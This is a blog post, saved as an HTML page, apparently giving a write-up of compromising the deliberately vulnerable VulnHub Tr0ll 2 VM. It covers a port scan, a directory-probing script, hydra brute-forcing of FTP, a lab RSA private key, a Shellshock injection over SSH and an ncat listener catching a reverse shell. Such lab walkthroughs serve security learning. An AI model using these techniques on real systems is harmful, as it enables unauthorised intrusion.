<!DOCTYPE html>
<html lang="en-us">
<head>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="theme" content="hugo-academic">
  <meta name="generator" content="Hugo 0.20.2" />
  <meta name="author" content="Giulio De Pasquale">
  <meta name="description" content="Computer Engineering Student">

  
  
  
    
  
  
    
    
    <link rel="stylesheet" href="/css/highlight.min.css">
    
  
  <link rel="stylesheet" href="/css/bootstrap.min.css">
  <link rel="stylesheet" href="/css/font-awesome.min.css">
  <link rel="stylesheet" href="/css/academicons.min.css">
  <link rel="stylesheet" href="//fonts.googleapis.com/css?family=Lato:400,700%7CMerriweather%7CRoboto+Mono">
  <link rel="stylesheet" href="/css/hugo-academic.css">
  

  <link rel="alternate" href="https://peperunas.github.io/index.xml" type="application/rss+xml" title="Giulio &#39;peperunas&#39; De Pasquale">
  <link rel="feed" href="https://peperunas.github.io/index.xml" type="application/rss+xml" title="Giulio &#39;peperunas&#39; De Pasquale">

  <link rel="icon" type="image/png" href="/img/icon.png">
  <link rel="apple-touch-icon" type="image/png" href="/img/apple-touch-icon.png">

  <link rel="canonical" href="https://peperunas.github.io/post/vm-troll2/">

  

  <title>VulnHub Tr0ll 2 VM write-up | Giulio &#39;peperunas&#39; De Pasquale</title>

</head>
<body id="top" data-spy="scroll" data-target="#navbar-main" data-offset="71">

<nav class="navbar navbar-default navbar-fixed-top" id="navbar-main">
  <div class="container">

    
    <div class="navbar-header">
      <button type="button" class="navbar-toggle collapsed" data-toggle="collapse"
              data-target=".navbar-collapse" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/">Giulio &#39;peperunas&#39; De Pasquale</a>
    </div>

    
    <div class="collapse navbar-collapse">

      
      <ul class="nav navbar-nav navbar-right">
        

        

        <li class="nav-item">
          <a href="/#about">
            
            <span>Home</span>
          </a>
        </li>

        
        

        

        <li class="nav-item">
          <a href="/#posts">
            
            <span>Posts</span>
          </a>
        </li>

        
        

        

        <li class="nav-item">
          <a href="/#projects">
            
            <span>Projects</span>
          </a>
        </li>

        
        

        

        <li class="nav-item">
          <a href="/#publications">
            
            <span>Publications</span>
          </a>
        </li>

        
        

        

        <li class="nav-item">
          <a href="/#talks">
            
            <span>Talks</span>
          </a>
        </li>

        
        

        
      </ul>

    </div>
  </div>
</nav>


<article class="article" itemscope itemtype="http://schema.org/Article">

  

  <div class="article-container">
    <h1 itemprop="name">VulnHub Tr0ll 2 VM write-up</h1>
    

<div class="article-metadata">

  <span class="article-date">
    <time datetime="2014-12-20 16:56:53 &#43;0200 &#43;0200" itemprop="datePublished">
      Sat, 20 Dec, 2014
    </time>
  </span>

  

  
  
  
  <span class="article-tags">
    <i class="fa fa-tags"></i>
    
    <a href="/tags/vulnbox">vulnbox</a
    >, 
    
    <a href="/tags/write-up">write-up</a
    >
    
  </span>
  
  

  
  
<div class="share-box" aria-hidden="true">
  <ul class="share">
    <li>
      <a class="facebook"
         href="https://www.facebook.com/sharer.php?u=https%3a%2f%2fpeperunas.github.io%2fpost%2fvm-troll2%2f"
         target="_blank">
        <i class="fa fa-facebook"></i>
      </a>
    </li>
    <li>
      <a class="twitter"
         href="https://twitter.com/intent/tweet?text=VulnHub%20Tr0ll%202%20VM%20write-up&amp;url=https%3a%2f%2fpeperunas.github.io%2fpost%2fvm-troll2%2f"
         target="_blank">
        <i class="fa fa-twitter"></i>
      </a>
    </li>
    <li>
      <a class="linkedin"
         href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3a%2f%2fpeperunas.github.io%2fpost%2fvm-troll2%2f&amp;title=VulnHub%20Tr0ll%202%20VM%20write-up"
         target="_blank">
        <i class="fa fa-linkedin"></i>
      </a>
    </li>
    <li>
      <a class="weibo"
         href="http://service.weibo.com/share/share.php?url=https%3a%2f%2fpeperunas.github.io%2fpost%2fvm-troll2%2f&amp;title=VulnHub%20Tr0ll%202%20VM%20write-up"
         target="_blank">
        <i class="fa fa-weibo"></i>
      </a>
    </li>
    <li>
      <a class="email"
         href="mailto:?subject=VulnHub%20Tr0ll%202%20VM%20write-up&amp;body=https%3a%2f%2fpeperunas.github.io%2fpost%2fvm-troll2%2f">
        <i class="fa fa-envelope"></i>
      </a>
    </li>
  </ul>
</div>


  

</div>

    <div class="article-style" itemprop="articleBody">
      <p><div class="alert alert-warning">
  <p><strong>Due to my blog transfer I lost some articles bits. This, unfortunately, is one of them. I’ll re-write (complete) this article soon. I’m very sorry.</strong></p>

</div>

Here we are. After having downloaded and booted the VM I’m greeted by a fantastic ASCII art banner. Isn’t it lovely?
</p>

<p>I did a quick scan and port 21, 22 and 80 were open.</p>

<pre><code>PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
</code></pre>

<p>Sincerely, I didn’t look for any known vulnerability and jumped immediately on the FTP server.</p>

<pre><code>220 Welcome to Tr0ll FTP... Only noobs stay for a while...
Name (trollvm:giulio):
</code></pre>

<p>Hmmm… no good. There’s no anonymous login. I needed to find another way. What’s in the HTTP server then?
That was the image in the root of the Apache server. There were no clues in the page source either:</p>

<pre><code class="language-html">&lt;html&gt;
    &lt;img src='tr0ll_again.jpg'&gt;
&lt;/html&gt;

&lt;!--Nothing here, Try Harder!&gt;
&lt;!--Author: Tr0ll&gt;
&lt;!--Editor: VIM&gt;
&lt;!--&gt;
</code></pre>

<p>The thing I did next was checking for some robot-blacklisted directory in the <code>robots.txt</code> file. Maybe I could get something useful out of it.</p>

<pre><code>User-agent:*
Disallow:
/noob
/nope
/try_harder
/keep_trying
/isnt_this_annoying
/nothing_here
/404
/LOL_at_the_last_one
/trolling_is_fun
/zomg_is_this_it
/you_found_me
/I_know_this_sucks
/You_could_give_up
/dont_bother
/will_it_ever_end
/I_hope_you_scripted_this
/ok_this_is_it
/stop_whining
/why_are_you_still_looking
/just_quit
/seriously_stop
</code></pre>

<p>Nice list eh? I’ve taken the suggestion in the file (“I hope you scripted this”) and I quickly wrote a Python script which opened each folder and showed me the results:</p>

<pre><code class="language-python">from http.client import HTTPResponse
from urllib import request
req = request.urlopen(&quot;http://192.168.1.63/robots.txt&quot;)
for line in req:
    if line.decode('utf-8').startswith('/'):
        test_url = &quot;http://192.168.1.63&quot;
        test_url += line.decode('utf-8')
        try:
            print (line.decode('utf-8'))
            print (request.urlopen(test_url).read())
        except:
            print (&quot;Page not found&quot;)
</code></pre>

<p>And I got this:</p>

<pre><code>/noob
&lt;html&gt;
&lt;img src='cat_the_troll.jpg'&gt;
&lt;!--What did you really think to find here? Try Harder!&gt;
&lt;/html&gt;
/nope
Page not found
/try_harder
Page not found
/keep_trying
&lt;html&gt;
&lt;img src='cat_the_troll.jpg'&gt;
&lt;!--What did you really think to find here? Try Harder!&gt;
&lt;/html&gt;
/isnt_this_annoying
Page not found
/nothing_here
Page not found
/404
Page not found
/LOL_at_the_last_one
Page not found
/trolling_is_fun
Page not found
/zomg_is_this_it
Page not found
/you_found_me
Page not found
/I_know_this_sucks
Page not found
/You_could_give_up
Page not found
/dont_bother
&lt;html&gt;
&lt;img src='cat_the_troll.jpg'&gt;
&lt;!--What did you really think to find here? Try Harder!&gt;
&lt;/html&gt;
/will_it_ever_end
Page not found
/I_hope_you_scripted_this
Page not found
/ok_this_is_it
&lt;html&gt;
&lt;img src='cat_the_troll.jpg'&gt;
&lt;!--What did you really think to find here? Try Harder!&gt;
&lt;/html&gt;
/stop_whining
Page not found
/why_are_you_still_looking
Page not found
/just_quit
Page not found
/seriously_stop
Page not found
</code></pre>

<p>So, the only existing folders were <code>noob</code>, <code>keep_trying</code>, <code>dont_bother</code> and <code>ok_this_is_it</code>.
Here’s where I got stuck. I was missing something for sure. So I thought that maybe Maleus used some steganography technique so I tried using <code>steghide</code>. That lead nowhere. Damn.
Then it struck me. Maybe the cat photos are different in some way.. I checked that out and I was right.</p>

<pre><code>3f0745a5f922cdebc591d5d74076c31bb6a93a8f1e1e351f91ec3ee32e980affcc0a8618b36c1ef7761a5687c1e640b5af0f5736fde8380d4a890060ef079a6b cat_the_troll (2).jpg
1367f1a2bc4f74bf636e8359a3e99caaf85e093ae1bf4348c969b133bf7e95445d8b6b97a03b9a7c425b9a42b5ac0b63eaa5b6e478b7b26ccf94a11424bdef9f cat_the_troll (3).jpg
3f0745a5f922cdebc591d5d74076c31bb6a93a8f1e1e351f91ec3ee32e980affcc0a8618b36c1ef7761a5687c1e640b5af0f5736fde8380d4a890060ef079a6b cat_the_troll (4).jpg
3f0745a5f922cdebc591d5d74076c31bb6a93a8f1e1e351f91ec3ee32e980affcc0a8618b36c1ef7761a5687c1e640b5af0f5736fde8380d4a890060ef079a6b cat_the_troll.jpg
ed0b7173ca8e9e47f59f3051bddbd6c0470394be155c2ae2b28911cbe4251b7cab87cdcdb57496b81458009c4a11cd308ea7039d6984b1267f6780285a694db1 tr0ll_again.jpg
</code></pre>

<p>Hidden in plain sight in one of those cat photos, in my case <code>cat_the_troll (3)</code>, there was a string, recovered through a quick use of the <code>strings</code> command, which said:</p>

<blockquote>
<p>“Look Deep within y0ur_self for the answer“</p>
</blockquote>

<p>I opened the <code>y0ur_self</code> directory on the HTTP server and there was a 1MB long <code>answer.txt</code> file waiting to be download. Let’s check that answer then!</p>

<pre><code>[... BIG snip ...]
Y29sbG9xdWl1bQo=
Y29sbG9xdWl1bXMK
Y29sbG9xdXkK
Y29sb24K
Y29tYmluZXMK
Y29tYmluZwo=
Y29tYmluaW5nCg==
Y29tYm8K
Y29tYm8K
[ ... VERY VERY VERY BIG snip ... ]
</code></pre>

<p>A base64 encoded dictionary!? Which one is the correct one? But, even more important… what answer to which question? The FTP server?</p>

<p>So I thought that the original clue,  <strong>“Look Deep within y0ur_self for the answer“</strong>, could be somewhere in this file. I coded another little Python script which tried every permutation of the clue, encoded it to base64 and wrote it to a file named <code>results.txt</code>.</p>

<pre><code class="language-python">from base64 import b64encode
from itertools import permutations
phrase = &quot;Look Deep within y0ur_self for the answer&quot;
with open(&quot;results.txt&quot;, &quot;w&quot;) as f:
    for len in range(1, len(phrase.split())):
    list = permutations(phrase.split(), len)
    for permutation in list:
        string = &quot; &quot;.join(permutation)
        b64_string = b64encode(bytes(string, 'utf-8'))
        f.write(str(b64_string.decode('utf-8')))
    f.write(&quot;\n&quot;)
</code></pre>

<p>After having created the <code>results.txt</code> file I tried to check whether some string was contained in the original <code>answer.txt</code> file. No luck. Daaaamn part two.</p>

<p>After a while being stuck again, I realized I was stupid as noone ever was. I didn’t even try do DECODE the dictionary and get some “strange” word in it! So I did decode it and tried to retrieve some valuable word, maybe a very long key, through awk. What I did was:</p>

<pre><code>cat answer_decoded.txt | awk '{ print length, $0 }' | sort -n
</code></pre>

<p>What I got back was REALLY nice:</p>

<pre><code>19 interdenominational
19 nonrepresentational
19 oversimplifications
20 Andrianampoinimerina
20 counterrevolutionary
20 electroencephalogram
20 uncharacteristically
21 electroencephalograms
21 electroencephalograph
22 counterrevolutionaries
22 electroencephalographs
30 ItCantReallyBeThisEasyRightLOL
</code></pre>

<p><strong>“ItCantReallyBeThisEasyRight“</strong>? That sounds great, I found something “valuable”… yeah… but… how should I use it?</p>

<p>Since I was not sure about that, I tried to search in the file for something else… something like <em>“lol“</em>, <em>“troll“</em>, <em>“noob“</em>, <em>“rofl”</em> and <em>”zomg“</em>. I was lucky again, I guess.</p>

<pre><code>[...snip...]
noooob_lol
trollololol
[...snip...]
</code></pre>

<p>With these 3 words plus the Tr0ll one (it appeared in the FTP Banner, do you remember?) I created a super-mini dictionary to use on the FTP server and I fired uphydra. And guess what? I got a match.</p>

<blockquote>
<p>Tr0ll:Tr0ll</p>
</blockquote>

<p>My dictionary was useless! Was I tr0lled again!?</p>

<pre><code>230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
&gt; ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--  1 0    0      1474 Oct 04 00:09 lmao.zip
226 Directory send OK.
</code></pre>

<p>Inside <code>lmao.zip</code> there was another file called <em>“noob”</em> which was password protected. BINGO! My dictionary maybe will come in handy this time!</p>

<pre><code>-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsIthv5CzMo5v663EMpilasuBIFMiftzsr+w+UFe9yFhAoLqq
yDSPjrmPsyFePcpHmwWEdeR5AWIv/RmGZh0Q+Qh6vSPswix7//SnX/QHvh0CGhf1
/9zwtJSMely5oCGOujMLjDZjryu1PKxET1CcUpiylr2kgD/fy11Th33KwmcsgnPo
q+pMbCh86IzNBEXrBdkYCn222djBaq+mEjvfqIXWQYBlZ3HNZ4LVtG+5in9bvkU5
z+13lsTpA9px6YIbyrPMMFzcOrxNdpTY86ozw02+MmFaYfMxyj2GbLej0+qniwKy
e5SsF+eNBRKdqvSYtsVE11SwQmF4imdJO0buvQIDAQABAoIBAA8ltlpQWP+yduna
u+W3cSHrmgWi/Ge0Ht6tP193V8IzyD/CJFsPH24Yf7rX1xUoIOKtI4NV+gfjW8i0
gvKJ9eXYE2fdCDhUxsLcQ+wYrP1j0cVZXvL4CvMDd9Yb1JVnq65QKOJ73CuwbVlq
UmYXvYHcth324YFbeaEiPcN3SIlLWms0pdA71Lc8kYKfgUK8UQ9Q3u58Ehlxv079
La35u5VH7GSKeey72655A+t6d1ZrrnjaRXmaec/j3Kvse2GrXJFhZ2IEDAfa0GXR
xgl4PyN8O0L+TgBNI/5nnTSQqbjUiu+aOoRCs0856EEpfnGte41AppO99hdPTAKP
aq/r7+UCgYEA17OaQ69KGRdvNRNvRo4abtiKVFSSqCKMasiL6aZ8NIqNfIVTMtTW
K+WPmz657n1oapaPfkiMRhXBCLjR7HHLeP5RaDQtOrNBfPSi7AlTPrRxDPQUxyxx
n48iIflln6u85KYEjQbHHkA3MdJBX2yYFp/w6pYtKfp15BDA8s4v9HMCgYEA0YcB
TEJvcW1XUT93ZsN+lOo/xlXDsf+9Njrci+G8l7jJEAFWptb/9ELc8phiZUHa2dIh
WBpYEanp2r+fKEQwLtoihstceSamdrLsskPhA4xF3zc3c1ubJOUfsJBfbwhX1tQv
ibsKq9kucenZOnT/WU8L51Ni5lTJa4HTQwQe9A8CgYEAidHV1T1g6NtSUOVUCg6t
0PlGmU9YTVmVwnzU+LtJTQDiGhfN6wKWvYF12kmf30P9vWzpzlRoXDd2GS6N4rdq
vKoyNZRw+bqjM0XT+2CR8dS1DwO9au14w+xecLq7NeQzUxzId5tHCosZORoQbvoh
ywLymdDOlq3TOZ+CySD4/wUCgYEAr/ybRHhQro7OVnneSjxNp7qRUn9a3bkWLeSG
th8mjrEwf/b/1yai2YEHn+QKUU5dCbOLOjr2We/Dcm6cue98IP4rHdjVlRS3oN9s
G9cTui0pyvDP7F63Eug4E89PuSziyphyTVcDAZBriFaIlKcMivDv6J6LZTc17sye
q51celUCgYAKE153nmgLIZjw6+FQcGYUl5FGfStUY05sOh8kxwBBGHW4/fC77+NO
vW6CYeE+bA2AQmiIGj5CqlNyecZ08j4Ot/W3IiRlkobhO07p3nj601d+OgTjjgKG
zp8XZNG8Xwnd5K59AVXZeiLe2LGeYbUKGbHyKE3wEVTTEmgaxF4D1g==
-----END RSA PRIVATE KEY-----
</code></pre>

<p>Sure it was! The password was <strong>ItCantReallyBeThisEasyRightLOL</strong>.</p>

<p>The next step was obvious. Login as noob through the SSH server.</p>

<pre><code>$ ssh -i noob noob@192.168.1.63
TRY HARDER LOL!
Connection to 192.168.1.63 closed.
</code></pre>

<p>DAMN!</p>

<p>Trying to pass it some command like ls, uptime or uname did not work. I think I need some heavy artillery… the Shell Shock bug.</p>

<pre><code>$ ssh noob@192.168.1.63 -i noob '() { :;}; echo &quot;I DO NOT NEED TO&quot;'
I DO NOT NEED TO
TRY HARDER LOL!
</code></pre>

<p>I think it works… right? I’ve then tried to recreate a reverse shell through the Linux built-in special device tcp while listening on my side with ncat on port 9000.</p>

<p>In the meantime…</p>

<pre><code>$ ncat -lvp 9000
Ncat: Version 6.46 ( http://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 192.168.1.63.
Ncat: Connection from 192.168.1.63:37682.
bash: no job control in this shell
noob@Tr0ll2:~$
</code></pre>
    </div>
  </div>

</article>

<div class="container">
  <nav>
  <ul class="pager">
    

    
    <li class="next"><a href="https://peperunas.github.io/post/plaid15-png_uncorrupt/">Plaid CTF 2015 - PNG Uncorrupt <span
      aria-hidden="true">&rarr;</span></a></li>
    
  </ul>
</nav>

</div>

<div class="article-container">
  

</div>

<footer class="site-footer">
  <div class="container">
    <p class="powered-by">

      &copy; 2017 Giulio De Pasquale &middot; 

      Powered by the <a href="https://github.com/gcushen/hugo-academic" target="_blank">Academic
      theme</a> for <a href="http://gohugo.io" target="_blank">Hugo</a>.

      <span class="pull-right" aria-hidden="true">
        <a href="#" id="back_to_top">
          <span class="button_icon">
            <i class="fa fa-chevron-up fa-2x"></i>
          </span>
        </a>
      </span>

    </p>
  </div>
</footer>

    <script src="//cdnjs.cloudflare.com/ajax/libs/gsap/1.18.4/TweenMax.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/gsap/latest/plugins/ScrollToPlugin.min.js"></script>
    <script src="/js/jquery-1.12.3.min.js"></script>
    <script src="/js/bootstrap.min.js"></script>
    <script src="/js/isotope.pkgd.min.js"></script>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery.imagesloaded/4.1.1/imagesloaded.pkgd.min.js"></script>
    <script src="/js/hugo-academic.js"></script>
    

    
    <script>
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-97932357-1', 'auto');
        ga('send', 'pageview');

         
        var links = document.querySelectorAll('a');
        Array.prototype.map.call(links, function(item) {
            if (item.host != document.location.host) {
                item.addEventListener('click', function() {
                    var action = item.getAttribute('data-action') || 'follow';
                    ga('send', 'event', 'outbound', action, item.href);
                });
            }
        });
    </script>
    

    
    
      
      <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/highlight.min.js"></script>

      
      <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/languages/python.min.js"></script>
      
      <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.9.0/languages/C.min.js"></script>
      

      

      <script>hljs.initHighlightingOnLoad();</script>
    

    
    
    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({ tex2jax: { inlineMath: [['$','$'], ['\\(','\\)']] } });
    </script>
    <script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.0/MathJax.js?config=TeX-AMS_CHTML"></script>
    

  </body>
</html>

